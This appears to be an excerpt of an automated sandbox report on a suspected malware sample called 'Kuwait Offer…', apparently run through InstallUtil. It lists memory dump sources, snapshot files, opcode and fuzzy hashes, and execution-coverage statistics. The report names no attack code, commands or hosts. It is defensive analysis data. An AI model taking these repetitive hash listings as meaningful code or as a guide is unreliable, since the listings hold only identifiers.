                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5046131e56ed2c24767d90eb3fdf813bc409c97c464d05d55e303a48244338f0
                                          • Instruction ID: 4da94c3480c949f272f9d51514f72ac61cfeea096c0b341d86b66d3186b3677e
                                          • Opcode Fuzzy Hash: 5046131e56ed2c24767d90eb3fdf813bc409c97c464d05d55e303a48244338f0
                                          • Instruction Fuzzy Hash: 11E01270A00209EFCB40DFA8D95069E77FAEB45304F1085A8D50DD7304D9315F049791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8a0a518673a01940b431aa38d9428d0bdc526cdaf1b7ffd77be02febd490c57
                                          • Instruction ID: 081c7727e3bffb946073cba43e015349297269f07d8fffef3928dd494d9d1695
                                          • Opcode Fuzzy Hash: f8a0a518673a01940b431aa38d9428d0bdc526cdaf1b7ffd77be02febd490c57
                                          • Instruction Fuzzy Hash: 92E0E270D1230CEFCB54EFB8D5492ADBBB9AB46606F2041EDC80893350EB319A80DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode Fuzzy Hash: 0e7f3dbd024e3c6495d56ca9d1ecc320e10119699a0949679ba568d97a0f3a7d
                                          • Instruction Fuzzy Hash: 1AB1E270E01218CFEB54CFA9C884B9DBBF6BF89304F5584A9D80DA7255DB349985CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f86df7ebf8c9260e9f2e44aa9cc05d64f52bd04d6ee88189fcce6b98f3667fe9
                                          • Instruction ID: 2ba3cbf3701971d3087224a7e1b1bb9dc4a4676afdd7f97c96154cd1eeebb738
                                          • Opcode Fuzzy Hash: f86df7ebf8c9260e9f2e44aa9cc05d64f52bd04d6ee88189fcce6b98f3667fe9
                                          • Instruction Fuzzy Hash: 89B1D270E01218CFEB54CFAAC884B9DBBF2BF89304F5584A9D80DA7255DB349985CF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20c2eb5ab6fd08c5f3aa40a0afd2af23956eb1d195c625f087c6d01c994b3547
                                          • Instruction ID: f6b09df48f3d18e67a392dd83acf5aef9301acc27527f61272567cd27cbcd1af
                                          • Opcode Fuzzy Hash: 20c2eb5ab6fd08c5f3aa40a0afd2af23956eb1d195c625f087c6d01c994b3547
                                          • Instruction Fuzzy Hash: F0C17575E116188FDB58DF6AC944ADDBBF2AF89300F14C1AAD809AB325DB305E81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e3ed61170fdcce8119b09e47255d2e44b4ad08f2585ee90fd370aaf8844af2a
                                          • Instruction ID: 0866a7777d6d15fba00b9ceb36a0620748df667e17f56d7202e0f4e3f96ee4a1
                                          • Opcode Fuzzy Hash: 5e3ed61170fdcce8119b09e47255d2e44b4ad08f2585ee90fd370aaf8844af2a
                                          • Instruction Fuzzy Hash: 39B1C170D05629CFEB94CFA9C884B9DBBF2BB49304F10906AD40ABB251DB749C89CF44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bdfa631b789dc029ade90efc2be3864e6ef82e9bdeae8058a417d0dce6358623
                                          • Instruction ID: 7923b62fde4524add49c9e529b55bbeac9e9c7aa57aa2bc9d1e1d95398a5b417
                                          • Opcode Fuzzy Hash: bdfa631b789dc029ade90efc2be3864e6ef82e9bdeae8058a417d0dce6358623
                                          • Instruction Fuzzy Hash: B7B1B070D01629CFEB94CFA9C884B9DBBF2BB89304F10916AD409BB251DB759D89CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 959e9df47478709d8b114c18aabb69d09276963fee7a435965a70485c0f01397
                                          • Instruction ID: 83c25306a876756704f8ae108337a1c985db2683f065cd87dfc5db9e0236b971
                                          • Opcode Fuzzy Hash: 959e9df47478709d8b114c18aabb69d09276963fee7a435965a70485c0f01397
                                          • Instruction Fuzzy Hash: A5915670E01229CFDB54CFA9D854B9DB7BAFF8A300F109069D119A7255DB359A85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45e0c0a68fe14771a661d390ec5a153a52e311d0357e73f5e812362e4b65820a
                                          • Instruction ID: 752c09f22ca7ab13c5b9c2465b847032e1e3e158a040ea9c30b0d16469edcc6c
                                          • Opcode Fuzzy Hash: 45e0c0a68fe14771a661d390ec5a153a52e311d0357e73f5e812362e4b65820a
                                          • Instruction Fuzzy Hash: 5FA1C474E01219CFDB54DF69C944B9EFBB6BF89200F1085AAD50EA7350DB30AA85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68a6393c7602c0df07682b55479de751fd717ec131e10497e4ef194a6849f18b
                                          • Instruction ID: 0a75adae3846fda5474f4070c2c95492bc879c373ed252833e0376a7de8055e5
                                          • Opcode Fuzzy Hash: 68a6393c7602c0df07682b55479de751fd717ec131e10497e4ef194a6849f18b
                                          • Instruction Fuzzy Hash: CFA1C274E01219CFDB64DF69C944B9DFBB6BF89200F0085AAD50EA7350DB30AA85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87c520f805ccf525fae0c27e643e45eb867aa4098ed5ce4d57f5b58aff299b58
                                          • Instruction ID: 8cab8d0db97ccf7bfb381bec6effd1889fee6e6c66c1b13667dd71d0e0acfe4a
                                          • Opcode Fuzzy Hash: 87c520f805ccf525fae0c27e643e45eb867aa4098ed5ce4d57f5b58aff299b58
                                          • Instruction Fuzzy Hash: 5C814470E01629CFDB54CFA9D854BADB7BAFF8A300F109069D11AA7354DB395A82CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7976123ef7dabcf71fe36be6b4dc08d6e5903cc4b6194e836b9a589649194ef4
                                          • Instruction ID: 4ae6a5270a8afa632f39920e2813959215077eade83eec7dafab3e057c988370
                                          • Opcode Fuzzy Hash: 7976123ef7dabcf71fe36be6b4dc08d6e5903cc4b6194e836b9a589649194ef4
                                          • Instruction Fuzzy Hash: 7E816B70A00609DFD718DFBAE85469ABBF6FF88304F14C57AC005AB269DF3A5846CB41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fd5fec84bbc0d0fdf42550fb923e471ef7225113aa8716d197b90772ae1cad1
                                          • Instruction ID: 368952fc4df01f1b98a13335cb10ab9fe0c0f325cadefa9e4819f63e97f23fc3
                                          • Opcode Fuzzy Hash: 4fd5fec84bbc0d0fdf42550fb923e471ef7225113aa8716d197b90772ae1cad1
                                          • Instruction Fuzzy Hash: 4B811774D45218CFEBA6DFA5D849BEDBBB1BF4A304F10E0AAD409A7250DB705985CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6dd44280654e00446a2a47a4ffbcae23521f9735c4d6c04a0c529f9403435f83
                                          • Instruction ID: b4a153062a0d60ec46854649469b819d828bacb0176217148008c3753b93ac1b
                                          • Opcode Fuzzy Hash: 6dd44280654e00446a2a47a4ffbcae23521f9735c4d6c04a0c529f9403435f83
                                          • Instruction Fuzzy Hash: 31811374D04218CFEB54EFAAD8447ADBBF6FF49304F009469D109A7650DB396989CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02f9f4999a3af54304fcf4ca89be7188586214d151f6ce4f81eb124af3424915
                                          • Instruction ID: cd329236967e0d41f7c2f8cce857a061da85af4631ee7c069f142a7a6c3dcacc
                                          • Opcode Fuzzy Hash: 02f9f4999a3af54304fcf4ca89be7188586214d151f6ce4f81eb124af3424915
                                          • Instruction Fuzzy Hash: F3812274D04208CFEB54EFAAD8847ADBBF6FF49304F009469D109A7650DB396989CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2b89cf3e4744fbec165efd41998015b15eb959577363e0324f0ab345c32d92b
                                          • Instruction ID: 8a1f9187a812af12c2af0a30b9fcdee6d65d16538790d472449f6cace4acb4c3
                                          • Opcode Fuzzy Hash: c2b89cf3e4744fbec165efd41998015b15eb959577363e0324f0ab345c32d92b
                                          • Instruction Fuzzy Hash: 1E711770A00609DFD718DFBAE85469ABBFAFB88304F14C579C009AB268DF7A58458B40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83dd04a19748e2ed6995143e8b4114e8324af0c2fa55bcb6a422ba6d97379166
                                          • Instruction ID: 4dac6fac9a3725a391bb0a97900fe805d977b88fe4b0411f825631ffab228c27
                                          • Opcode Fuzzy Hash: 83dd04a19748e2ed6995143e8b4114e8324af0c2fa55bcb6a422ba6d97379166
                                          • Instruction Fuzzy Hash: 554167B1E016198BDB48CFABC94069EFBF3AFC8300F15C16AD918AB264DB3059468B54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 415746edf71e0418968c6f0a966c106d3753372b445335d2ca0abc94be000371
                                          • Instruction ID: 0d73f168d127759607443a06d453ebc6feea34ae504a68fad26dd4e66b3b7be5
                                          • Opcode Fuzzy Hash: 415746edf71e0418968c6f0a966c106d3753372b445335d2ca0abc94be000371
                                          • Instruction Fuzzy Hash: E3510570D05A29CFEBA4CF5AD8447A9B7F2EF9A309F1094AAC409B3244D7740AD9CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7bb7103b67d94382d062e4b609f5468b3a927c484df6ca0cc5adee5d125a97
                                          • Instruction ID: 64a9da1b89e954f9cf4035d7c499052f00bd64ec358128cb78435ef522a8e51f
                                          • Opcode Fuzzy Hash: 2e7bb7103b67d94382d062e4b609f5468b3a927c484df6ca0cc5adee5d125a97
                                          • Instruction Fuzzy Hash: CF41FDB4D10349DFDB54CFA9D884BEEBBF1BB09300F20912AE855AB250D7B49886CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b8938510bc84d829ba017db683f8a672074b5ea8afc019f5e4ea537725a2b53
                                          • Instruction ID: 63a4980dd71836114d513a9a256bed402c02072b61dfb1f9967a36512929765a
                                          • Opcode Fuzzy Hash: 9b8938510bc84d829ba017db683f8a672074b5ea8afc019f5e4ea537725a2b53
                                          • Instruction Fuzzy Hash: 9D41DCB4D10348DFDB54CFA9D885BDEBBF1BB09300F209129E819AB250D7B49886CF55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01057c94d6c2c215235d21e634be5483cf67c75eaba15385def8676ac2544e54
                                          • Instruction ID: 58833dea79e658e9db2f428f5694b13fa49b507ee36a36dc48be195dc4f0b0ba
                                          • Opcode Fuzzy Hash: 01057c94d6c2c215235d21e634be5483cf67c75eaba15385def8676ac2544e54
                                          • Instruction Fuzzy Hash: 8F510DB1D056588BEB2DCF2B8D446CAFAF7AFC9300F54C1FA944CA6255DB7009858F51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e305d938dc65d86c707d3a0e901386d362bce22395052e4d3affc534a1e0b138
                                          • Instruction ID: 0fba149a291cbedff5b90b11afca95c0fc970827232f56965dabeef731dbd67d
                                          • Opcode Fuzzy Hash: e305d938dc65d86c707d3a0e901386d362bce22395052e4d3affc534a1e0b138
                                          • Instruction Fuzzy Hash: 2521F635807744BADBEA9A249E019DBFBF8AB53710F11214AE8416B592C7343F02DAE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e0a776270d46d8d6641c2d4d70d042ec0ea2d1919596274a4d1ace5da8e2b25
                                          • Instruction ID: e1a6545e10eddadf0adbfdee79aacb2d09cc6be0c8a684dfb929ec95fcc0f621
                                          • Opcode Fuzzy Hash: 3e0a776270d46d8d6641c2d4d70d042ec0ea2d1919596274a4d1ace5da8e2b25
                                          • Instruction Fuzzy Hash: A641F0B5D05258DFDB10CFA9D480AEEFBF4AB49310F14942AE455B7240C778AA85CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f7f23e1a43bc69e6fc050dab924b96a0feffcd7e43b59f3a96a5e9531ad8274
                                          • Instruction ID: e494b5713230612a6810d9ae2542521525076af905a5146fbb7f4d9a74abdce3
                                          • Opcode Fuzzy Hash: 1f7f23e1a43bc69e6fc050dab924b96a0feffcd7e43b59f3a96a5e9531ad8274
                                          • Instruction Fuzzy Hash: A341EFB5C05258DFDB00CFAAD484AEEFBF0AF49310F14942AE455B7240C778AA85CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3e21ae05628aa7b930a11ad6f9984659e7a9b94529132d88932585368bbdb43
                                          • Instruction ID: 39969d0ca3537c82234f71f32af1a16ff063bed9e8ddb80ec8172a1fb6eae89c
                                          • Opcode Fuzzy Hash: a3e21ae05628aa7b930a11ad6f9984659e7a9b94529132d88932585368bbdb43
                                          • Instruction Fuzzy Hash: 873177B1E156188BEB68CF27C95878AFAF7AFC9304F54C1B9C40CA6254DB740A858F41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8185bddfa103c9ed1fffa5ab399e02c0fea045af1d6c7703051a726a3e14a933
                                          • Instruction ID: edecd01db1afc75abb3342bbc62a99bed32a8d22744cdfedbaf9c54dd7c4f34c
                                          • Opcode Fuzzy Hash: 8185bddfa103c9ed1fffa5ab399e02c0fea045af1d6c7703051a726a3e14a933
                                          • Instruction Fuzzy Hash: 913176B1D116188BEB68CF6BD95878EFBF7AFC9304F14C1A9C44CAA254DB750A858F01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1e7759861c7011f49c11b916857e775abfeade14743045b4a58c5397cfc79ad
                                          • Instruction ID: 963dc104a3ebc29a64956b5cb6b80de945f2edee0c87ff4b6fbbdb9a6b7f88d3
                                          • Opcode Fuzzy Hash: e1e7759861c7011f49c11b916857e775abfeade14743045b4a58c5397cfc79ad
                                          • Instruction Fuzzy Hash: A6216171D156598BEB6CCF6B8D4429AF6F7AFC8300F14C1BA840CA6264DB740A85CF54

                                          Execution Graph

                                          Execution Coverage:7.6%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:21
                                          Total number of Limit Nodes:4

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1947 52cd808-52ce1ec GlobalMemoryStatusEx 1950 52ce1ee-52ce1f4 1947->1950 1951 52ce1f5-52ce21d 1947->1951 1950->1951
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,052CE0F2), ref: 052CE1DF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 77529d58bfe0296dc291787792d94cf5af99a32f4ac77aa6f5fef8c0f2123f45
                                          • Instruction ID: 9a0372c9645cf2e2a1fd91a2706421bde92706b1c51e6c8114c555f4577612ce
                                          • Opcode Fuzzy Hash: 77529d58bfe0296dc291787792d94cf5af99a32f4ac77aa6f5fef8c0f2123f45
                                          • Instruction Fuzzy Hash: FA513734600A04CFCB14EB78C959AAE77F2FF49705F2004A9D506EB3A1DB369D06DBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04dd51389644530a91f7b1c9ecf90425cada3d4967420a837108731bf82b6d77
                                          • Instruction ID: 9e1917581ffc027739b99fb350d799da96bb773d85f89b99cb0e35d6c286a911
                                          • Opcode Fuzzy Hash: 04dd51389644530a91f7b1c9ecf90425cada3d4967420a837108731bf82b6d77
                                          • Instruction Fuzzy Hash: A25123B4E002188FDB14DFA9C889B9DBBB1FF48310F14852AE819AB351E775A844CF91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71e0b184524f6678f5a175547b20cf03cba539afc9419bcc6c34ea641a1d982a
                                          • Instruction ID: b86de1ce490538b2d5c0cd1dd031917c7e164111c0b626beaba9e10f056a3095
                                          • Opcode Fuzzy Hash: 71e0b184524f6678f5a175547b20cf03cba539afc9419bcc6c34ea641a1d982a
                                          • Instruction Fuzzy Hash: 5B5113B4E00218CFDB14DFA9C885B9DBBB1FF48714F148529E819AB351EB74A844CF95
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b092907e86bcb9642acb691d6b7f4a88166fb382c34a816ca91812dd5438313e
                                          • Instruction ID: aa4021311bd91cc9e7055c482aa5e9214e3725f998c0830f9683ac96aeb47ad1
                                          • Opcode Fuzzy Hash: b092907e86bcb9642acb691d6b7f4a88166fb382c34a816ca91812dd5438313e
                                          • Instruction Fuzzy Hash: CA417C75B00245CBDF20AB7894696AE7BFAFF49311F200469D942EB3A5DF318C42DB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea7ed8a721473502b8014530df17faafe40e6feae51cd4e07469579380725644
                                          • Instruction ID: e5ff4f69a56eb9b9e8387514c8892827326c78204c7353397236d0a34ecc731a
                                          • Opcode Fuzzy Hash: ea7ed8a721473502b8014530df17faafe40e6feae51cd4e07469579380725644
                                          • Instruction Fuzzy Hash: A7319C30B002058FDB15AB74D56466E7BB2FF89304B244579D506EB396EF39CC46CB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a79006b7469b35302537572e3b459f7af18521f782d693cf76ebe65285f2f787
                                          • Instruction ID: c2151ebcc00796c8d22fdfda4268b8e026dd9a60e2b9ba6177abb20e28c08ca5
                                          • Opcode Fuzzy Hash: a79006b7469b35302537572e3b459f7af18521f782d693cf76ebe65285f2f787
                                          • Instruction Fuzzy Hash: 73514070206A45CFC706FB68FC92E493FA1B797205B04996AD5014B27AEA70694FFB81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12c31a0059075c2104158b86cdc4f443d8f2989eec97d02e518dc7c261529d52
                                          • Instruction ID: f99188116b42bcb89f672f35c3a4c227bb53f642c10752423319dc49b62b2a70
                                          • Opcode Fuzzy Hash: 12c31a0059075c2104158b86cdc4f443d8f2989eec97d02e518dc7c261529d52
                                          • Instruction Fuzzy Hash: 8B31CB30B002058BDB15ABB8E56466F7BB2FB89340F248479D506EB396EF35CC46CB91
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb9992b5d550ab5a48f563e7e5bbe7cbdfce6014b5200e19044f37ebeb536110
                                          • Instruction ID: 4b2b7d0b99c75ea1a427bba792c3f3cb99d408537f3ebcb5a230fc33a56cd327
                                          • Opcode Fuzzy Hash: cb9992b5d550ab5a48f563e7e5bbe7cbdfce6014b5200e19044f37ebeb536110
                                          • Instruction Fuzzy Hash: 0B411F70606A45CFC706FF68FC92E493FA1B797205B00996AD5014B27AEA70694FFB81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e8256d6d6ae45e8c32d886d3337f306fcc7178da32b3f08e4a01a466a0b7ddc
                                          • Instruction ID: be6827c8db0fea7ce5a3730b989a90648913cd2c6fb88cfeee6111924d880cd0
                                          • Opcode Fuzzy Hash: 5e8256d6d6ae45e8c32d886d3337f306fcc7178da32b3f08e4a01a466a0b7ddc
                                          • Instruction Fuzzy Hash: 2B318E70E10609CBDB24DBA5D450B9EB7B1FF95310F20852AE505EB280EBB1DC45CB50
                                          Memory Dump Source
